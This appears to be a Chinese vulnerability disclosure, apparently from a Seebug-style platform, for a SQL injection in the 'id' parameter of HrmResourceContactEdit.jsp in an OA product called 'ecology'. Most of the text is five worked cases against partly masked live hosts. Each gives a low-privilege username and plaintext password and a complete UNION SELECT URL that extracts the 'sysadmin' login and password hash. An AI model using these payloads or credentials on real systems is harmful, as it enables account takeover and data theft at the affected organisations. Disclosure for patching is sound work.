### 简要描述:
### 详细说明:
注入点:/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29&isView=1
注入参数为id
需要普通用户登录。
案例一:
在官网用手机号码登陆后进行测试,登陆后访问:
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/02182142b9737b5eeee9eb8ced03e1517621213e.png" alt="ecology11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/02182142b9737b5eeee9eb8ced03e1517621213e.png)
由于版本不一样,所以字段数不一样,但是注入点是相同的。
案例二:http://**.**.**.**:812/login/Login.jsp?logintype=1
程凯/111111。登陆后访问:
http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/021826062b1f6f8b651b19bd3fa14d8bf1d2a6a7.png" alt="ecology12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/021826062b1f6f8b651b19bd3fa14d8bf1d2a6a7.png)
案例三:http://**.**.**.**/login/Login.jsp?logintype=1
wangp/111111。登陆访问
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/02182939898ac575245c9a24d1f551f9dd93f8b0.png" alt="ecology13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/02182939898ac575245c9a24d1f551f9dd93f8b0.png)
案例四:http://**.**.**.**:18881/login/login.jsp
guobg/1。这个字段数是92
登陆访问:
http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/021834146a998bdaf64d89c6c8c1a53ccd0fa39e.png" alt="ecology14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/021834146a998bdaf64d89c6c8c1a53ccd0fa39e.png)
案例五:**.**.**.**:8080/login/Login.jsp?logintype=1
杨先坤/111。字段数为105
登陆后访问:**.**.**.**:8080/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/02183939ce8107f8cae048e1ec08b29a13716cb7.png" alt="ecology16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/02183939ce8107f8cae048e1ec08b29a13716cb7.png)
测试的版本包括:8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919
### 漏洞证明:
京公网安备 11010502034610号
暂无评论